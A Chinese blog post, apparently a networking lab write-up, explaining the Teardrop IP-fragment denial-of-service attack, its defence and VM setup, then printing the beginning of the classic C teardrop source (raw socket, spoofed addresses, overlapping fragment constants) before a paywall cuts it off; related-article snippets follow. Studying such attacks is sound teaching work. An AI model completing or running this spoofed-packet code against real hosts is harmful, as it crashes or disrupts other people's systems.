【网络通信】Teardrop编程创造虚假IP包

最新推荐文章于 2024-10-11 16:59:47 发布
最新推荐文章于 2024-10-11 16:59:47 发布
阅读量280 收藏
点赞数
分类专栏: 网络通信编程 文章标签: ubuntu c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43704348/article/details/110708668
版权
本文介绍如何通过编程实现Teardrop攻击,伪造含有错误分片偏移的IP包,导致目标系统崩溃。在Ubuntu18.04环境下,利用C语言编写代码创建虚假IP包,并通过Wireshark抓包验证。同时讨论了攻击原理、防御方法以及虚拟机的桥接模式设置。
摘要由CSDN通过智能技术生成

目录


实验目的:

完成Teardrop代码编程,伪造一个虚假地址的IP包,包的内容填入Fake News,发送此包,并用wireshark抓包进行验证。

实验环境:

  • Ubuntu18.04
  • C语言

一、了解Teardrop攻击

攻击原理:
攻击者A给受害者B发送一些分片IP报文,并且故意将“13位分片偏移”字段设置成错误的值(既可与上一分片数据重叠,也可错开),B在组合这种含有重叠偏移的伪造分片报文时,会导致系统崩溃。
在这里插入图片描述
当对一台机器发动泪滴攻击时,该机器就会崩溃或重启。 (在Windows机器上,用户可能会遇到蓝屏死机)。 如果你正确防御了Winnuke和SSping的 DoS攻击,但仍然发生崩溃,那么极有可能受到泪滴攻击或LAND攻击。

防御方法:
网络安全设备将接收到的分片报文先放入缓存中,并根据源IP地址和目的IP地址对报文进行分组,源IP地址和目的IP地址均相同的报文归入同一组,然后对每组IP报文的相关分片信息进行检查,丢弃分片信息存在错误的报文。为了防止缓存益处,当缓存快要存满是,直接丢弃后续分片报文。

二、虚拟机及环境

打开虚拟机前设置桥接模式
先打开[设置]
在这里插入图片描述
勾选[桥接模式]
在这里插入图片描述

三、相关代码

c程序代码:创建一个虚假ip包

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <errno.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else  
/* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000  /* More IP fragment en route */
#define IPH 0x14    /* IP header size */
#define UDPH 0x8     /* UDP header size */
#define PADDING  0x1c    /* datagram frame padding for first packet */
#define MAGIC  0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT 0x1  
/* Linux dies with 1, NT is more stalwart and can
 * withstand maybe 5 or 10 sometimes...  Experiment.
 */

//错误处理函数
void usage(u_char *);
//获取主机信息
u_long name_resolve(u_char *);
//设置 IP 包的内容并发送
void send_frags(int ,u_long,u_long,u_short,u_short);

//主函数
int main(int argc,char **argv)
{
   
    int one = 1, count = 0, i, rip_sock;
    //定义无符号长整型源 IP 和目的 IP
    u_long src_ip = 0, dst_ip = 0;
    //定义无符号短整型源端口号和目的端口号
    u_short src_prt = 0, dst_prt = 0;
    /*
    定一个结构体 in_addr(表示一个32位的IPv4地址)的一个对象
    struct in_addr
    {
        union
        {
            struct
            {
                u_char s_b1,s_b2,s_b3,s_b4;
            } S_un_b; //An IPv4 address formatted as four u_chars.
            struct
            {
                u_short s_w1,s_w2;
            } S_un_w; //An IPv4 address formatted as two u_shorts
            u_long S_addr;//An IPv4 address formatted as a u_long
        } S_un;
        #define s_addr S_un.S_addr
    };
    */
    struct in_addr addr;
    printf("teardrop route|daemon9\n\n");

    /*
    创建一个原始套接字
    AF_INET——IPv4地址;
    SOCK_RAW——原始的套接字类型
    IPPROTO_RAW——允许使用底层的套接字协议,就可以自己编写IP包
    如果创建套接字成功,则会返回一个描述符(int型),失败则会返回 INVALID_SOCKET
    每个电脑里面都会有一个描述符表,对应套接字
    如果创建失败,将错误消息输出到屏幕
    然后退出程序
    */
    if((rip_sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
    {
   
	fprintf(stderr,"raw socket");
	exit(1);
    }

    /*
    设置原始套接字选项 IP_HDRINCL
    如果不设置这个选项,IP 协议会自动填充 IP 数据包的首部
    这个情况是我们所不需要的,我们需要自己编写 IP 包
    */
    if(setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one
最低0.47元/天 解锁文章
浮空花园
关注
专栏目录
Teardrop
10-25
"Teardrop"在IT行业中通常指的是一个设计独特的字体或者图形元素,可能是一个特定的字体样式或者是图形设计软件中的一个预设元素。字体是计算机图形学和排版设计中的重要组成部分,它们影响着文本的可读性、视觉效果...
Socket实战——Teardrop代码编程
explain_sin的博客
12-03 312
目录准备阶段验证参考资料 准备阶段 将虚拟机网络适配器的连接模式更改为桥接模式 进入虚拟机,创建一个名为Teardrop(泪滴攻击)的文件,并输入以下代码 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <net
qt 案例 例程 wireshark
abc
04-09 831
qt 案例 例程 wireshark 11 Version 2.6.2 (v2.6.2-0-g1b3cedbc) Copyright 1998-2018 Gerald Combs <gerald@wireshark.org> and contributors. License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html> This is free
畸形报文攻击有哪些种类?遇到畸形报文攻击怎么防御?
最新发布
携手驰网小林一同探索拥有一台服务器可以做哪些很酷的事情吧~
10-11 336
LAND 攻击是攻击者利用 TCP 连接三次握手机制中的缺陷,向目标主机发送一个地址和目的地址均为目标主机、源端口和目的端口相同的 SYN 报文,目标主机接收到该报文后,将创建一个地址和目的地址均为自己的TCP 空连接,直至连接超时。Smurf 攻击是指攻击者向目标网络发送地址为目标主机地址、目的地址为目标网络广播地址的 ICMP 请求报文,目标网络中的所有主机接收到该报文后,都会向目标主机发送 ICMP 响应报文,导致目标主机收到过多报文而消耗大量资源,甚至导致设备瘫痪或网络阻塞。
Socket编程实验
tyro_00的博客
12-05 1005
Socket编程实验完成“网络编程技术”参考书上 “2.11 原始套接字编程”中的Teardrop代码编程伪造一个虚假地址IP内容填入Fake News。发送此包并用wireshark进行验证。完成“网络编程技术”参考书上 “2.12 SOCKET应用实例”中的两个编程实例,并在ubuntu与树莓派之间进行验证 完成“网络编程技术”参考书上 “2.11 原始套接字编程”中的Teardrop代码编程伪造一个虚假地址IP内容填入Fake News。发送此包并用wireshark
网络编程Socket之wireshark使用
m0_67393827的博客
04-29 1294
这里只对wireshark进行简单的使用介绍。里面的报表,IO图形分析等以后再谈… 这里不提供下载地址了,不是什么稀有资源,我使用的wireshark是在百度软件中心下载的。 一步曲 :选择需要监听网卡接口(capture interface) :启动 选择网卡,单击start 就可以启动wireshark 我的电脑安装有虚拟机,所以会有vmware network adapter ,默认只会有“本地连接”,如果这个框没有可选的网卡,有可能是被隐藏掉了,点击 --“ Options” 会弹出Capture
原始套接字编程:Teardrop伪造IP
weixin_45189408的博客
12-07 682
目录原始套接字概述功能含义原始套接字和标准套接字的区别Teardrop伪造IPTeardrop 攻击原理Teardrop 防御方法编写teardrop代码 原始套接字 概述 raw socket,即原始套接字,可以接收本机网卡上的数据帧或者数据,对于监听网络的流量和分析是很有作用的,一共可以有4种方式创建这种socket。 1.socket(PF_INET, SOCK_RAW, IPPROTO_TCP|IPPROTO_UDP|IPPROTO_ICMP)发送接收ip数据 2.socket(PF_PAC
E084-Python安全渗透测试-TEAR DROP渗透测试.pdf
12-02
E084-Python安全渗透测试-TEAR DROP渗透测试
TCP/IP通信c#例程
02-23
在IT行业中,网络通信是至关重要的一个领域,TCP/IP(Transmission Control Protocol/Internet Protocol)作为互联网的基础协议,被广泛应用于各种应用程序中。本项目“TCP/IP通信c#例程”提供了一个C#语言实现的...
pagetear网络编程程序
01-09
"pagetear网络编程程序"是一个专注于网络编程的软件或工具,其名称可能来源于网页取(page tear)的概念,通常用于数据传输、网络通信或者网络数据采集等场景。网络编程是计算机科学的一个重要领域,它涉及到通过...
常见网络ip攻击及检测 方法
12-30
常见的网络IP攻击有Land 攻击、TCP SYN 攻击、Ping Of Death 攻击、WinNuke 攻击、Teardrop 攻击、TCP/UDP 端口扫描、木马Master Paradise、Hackers Paradise 开放MSG Authentication 端口 31、ncx99 开放Metagram ...
常见IP碎片攻击详解
ZCatLinux --资讯与技术社区--Open Source World----Linux/Shell/DevOPS--
08-30 2037
本文简单介绍了IP分片原理,并结合Snort结果详细分析常见IP碎片攻击的原理和特征, 最后对阻止IP碎片攻击给出一些建议。希望对加深理解IP协议和一些DoS攻击手段有所帮助。 1. 为什么存在IP碎片 -=-=-=-=-=-=-=-=-=-=-= 链路层具有最大传输单元MTU这个特性,它限制了数据帧的最大长度,不同的网络类型都有一 个上限值。以太网的MTU是1500,你可以用 netstat
wireshark
夜车星繁的博客
06-19 5773
晚上看渗透教程看的很懵。。。 在此水一篇教程,接下来会努力学习写出好的博客。 Wireshark界面说明 过滤器表达式书写是wireshark使用的核心,但在此之前,很多初学者还会碰到一个难题,就是感觉wireshark界面上很多东西不懂怎么看。其实还是挺明了的我们下面简单说一下,如下图。 1号窗口展示的是wireshark捕获到的所有数据的列表。注意最后一列Info列是wires...
数据伪造替换、会话劫持、https劫持之探索和测试
要把所有那些负面的信息当做对自身行为的评价,而不是对自身价值的评判。
05-25 1406
https劫持是在dns数据劫持的基础上,将客户端对相应域名的访问,劫持到特定的主机H上,在H主机上有一特定程序,采用中间人劫持攻击的方式,对服务器伪装成客户端,对客户端伪装成服务器,将客户端发起的网络连接发送到服务器,将服务器的数据返回给客户端,代理劫持客户端的https数据流。数据劫持攻击原理:监听客户端的数据,根据客户端数据内容,依次修改数据中的数据部分,以及MAC、IP、TCP(UDP)层的长度,校验值等,将伪造数据发送给客户端,以控制客户端的网络行为判断。
Wireshark分析Yersinia 根据DHCP协议发送伪造数据攻击(sending RAW packet)
千尺浪的博客
12-19 2576
结果如下: 与分析 帧号时间   源地址         目的地址     高层协议  内信息概况 No.  Time   Source        Destination      Protocol    Info 5  1.04252000  0.0.0.0   255.255.255.255  DHCP    -TransactionID 0x643c9869 
(1)数据嗅探和欺骗-SEED Ubuntu 20.04
weixin_52521462的博客
10-23 4870
数据嗅探和欺骗实验
计算机网络实验系列一:socket应用编程实验
cpluss的博客
08-13 7676
一、由于时间原因只能贴出图片,若有问题,可留言。如果遇到github上出错或压缩损坏,请留言。 实验代码和报告:链接:https://pan.baidu.com/s/1ZifaKKcwJYaAWiY7s23uRA 密码:6k7g   ...
Sock学习1 (网络基本知识、Sock简介)
Mark_Xu的博客
06-29 2201
网络基本知识两台计算机之间的通信必须满足一下一些必然的条件1)两台主机需要一个唯一的标识,标识他们所在的位置(ip地址)2)他们需要有共同的源(协议)3)每台主机需要相应的端口号,每台主机有不同的应用程序通讯,每个通讯就是通过端口号来区分的。端口号的范围为0~65535,但是其中0~1023 被系统保留。TCP/IP协议TCP/IP协议 是目前世界上应用最广泛的协议。是以TCP/IP为基础的不同层...
关于数据的伪装,UDP,TCP
u010467538的专栏
09-07 9713
不知道会不会有人看我的文章呢? 很多情况下,当我们无论是在百度或者谷歌上搜索数据的伪装,最多的情况就是伪装自己的ip地址的网络攻击。今天我要讲的是通过修改UDP数据报报头以达到伪装成TCP数据的过程。 首先你们可能会问为什么要伪装? 当今网络的传输层支持两大基本协议,TCP和UDP
TearDrop攻击:IP网络分片重组原理详解
"《TearDrop攻击:IP网络基础知识及原理详解》一文主要探讨了IP网络中的一个安全问题——TearDrop攻击,这是一种利用IP分片机制进行的拒绝服务攻击。文章首先从IP网络的基础概念出发,介绍了IP协议的核心组成部分,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值